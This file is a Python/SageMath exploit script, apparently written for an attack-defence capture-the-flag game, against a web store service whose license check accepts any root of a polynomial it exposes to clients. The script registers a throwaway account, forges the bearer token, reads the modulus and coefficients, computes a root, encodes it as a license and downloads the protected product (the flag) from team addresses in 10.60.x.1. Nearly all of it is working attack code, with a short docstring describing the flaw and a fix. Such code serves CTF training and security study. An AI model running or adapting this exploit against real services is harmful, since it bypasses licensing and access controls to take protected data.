service4-store1-vuln2-roots.sage
#!/bin/env python3
import base64
import random
import requests
import string
import sys
def random_string(min, max):
    """Return a random ASCII alphanumeric string of min to max characters.

    The length is drawn with ``random.randint(min, max)`` (both bounds
    inclusive) and every character is picked independently from the ASCII
    letters and digits.

    Note: ``random`` is not a cryptographically secure generator. In this
    file the result is only used as a throwaway username/password; values
    that must be unguessable should come from ``secrets`` instead.
    """
    alphabet = string.ascii_letters + string.digits
    length = random.randint(min, max)
    chars = []
    for _ in range(length):
        chars.append(random.choice(alphabet))
    return ''.join(chars)
def num_to_list(x):
    """Return the base-26 digits of x, least-significant digit first.

    Values below 26 (including 0) come back as the single-element list
    ``[x]``. For larger values the remainder modulo 26 is emitted and the
    quotient is processed next, so the final element is the most
    significant digit.
    """
    digits = []
    remaining = x
    # Peel off low-order digits until the remainder fits in a single digit.
    while not remaining < 26:
        digits.append(remaining % 26)
        remaining = remaining // 26
    digits.append(remaining)
    return digits
def license_to_string(x):
    """Encode the integer x in the dash-separated license text format.

    The base-26 digits of x (least significant first, from ``num_to_list``)
    are mapped to the letters A-Z, the result is right-padded with "A" up to
    a multiple of seven characters, and the groups of seven are joined with
    "-". Because "A" stands for digit 0 and is appended at the
    most-significant end, the padding does not change the encoded value.
    """
    alphabet = string.ascii_uppercase
    letters = ''.join(alphabet[digit] for digit in num_to_list(x))
    # Number of "A" characters needed to reach the next multiple of 7.
    missing = -len(letters) % 7
    letters = letters + "A" * missing
    groups = []
    for start in range(0, len(letters), 7):
        groups.append(letters[start:start + 7])
    return '-'.join(groups)
def exploit(ip, flag_id):
    """Run the polynomial-root license check against one product and return the reply.

    What the code does, in order:

    1. Registers a fresh account with random credentials on
       ``http://<ip>:5000/api/register``.
    2. Builds the ``Authorization`` header as ``Bearer`` followed by the
       base64 encoding of ``<user_id>:<session>`` from the registration reply.
    3. Fetches ``/api/products/<flag_id>`` and reads ``license.mod`` and
       ``license.poly`` from the JSON body.
    4. Interprets ``poly`` as a polynomial over GF(mod), computes its roots,
       and encodes the last root with ``license_to_string``.
    5. Posts that string as ``license`` to the product's download endpoint
       and returns the response body text.

    Security note for maintainers of the service: the product record returned
    to any registered account carries the modulus and the polynomial
    coefficients. Presumably the server accepts any value that is a root of
    that polynomial as a valid license (confirm against the service code);
    if so, the published data is enough to derive one, because root finding
    for a univariate polynomial over a finite field is efficient. The check
    should not depend on material the client can read -- e.g. keep the
    polynomial server-side, or verify a keyed value such as an HMAC.

    No HTTP status or shape checks are made: ``.json()``, the dictionary
    lookups and ``roots[-1]`` raise if the replies are not as expected or the
    polynomial has no root in the field.
    """
    credentials = {
        'username': random_string(16, 24),
        'password': random_string(12, 24),
    }
    register_reply = requests.post(f'http://{ip}:5000/api/register',
                                   data=credentials, timeout=5)
    account = register_reply.json()

    # The bearer value is just base64("<user_id>:<session>").
    raw_token = str(account['user_id']) + ':' + account['session']
    auth_headers = {
        'Authorization': 'Bearer ' + base64.b64encode(raw_token.encode()).decode(),
    }

    product_reply = requests.get(f'http://{ip}:5000/api/products/{flag_id}',
                                 headers=auth_headers, timeout=5)
    license_info = product_reply.json()["license"]
    mod = int(license_info["mod"])
    coefficients = []
    for coefficient in license_info["poly"]:
        coefficients.append(int(coefficient))

    # Sage: build the polynomial over the finite field and list its roots
    # as (root, multiplicity) pairs.
    field = GF(mod)
    ring = PolynomialRing(field, 'x')
    candidate_roots = ring(coefficients).roots()
    last_root = candidate_roots[-1][0]
    crafted_license = license_to_string(int(last_root))

    download_reply = requests.post(
        f'http://{ip}:5000/api/products/{flag_id}/download',
        data={'license': crafted_license},
        headers=auth_headers,
        timeout=10,
    )
    return download_reply.text
if __name__ == "__main__":
    # Usage: <script> TEAM_ID FLAG_ID
    # TEAM_ID is substituted into the third octet of the target address,
    # FLAG_ID is the product identifier passed to exploit().
    team_id, flag_id = sys.argv[1], sys.argv[2]
    ip = f"10.60.{team_id}.1"
    result = exploit(ip, flag_id)
    print(result)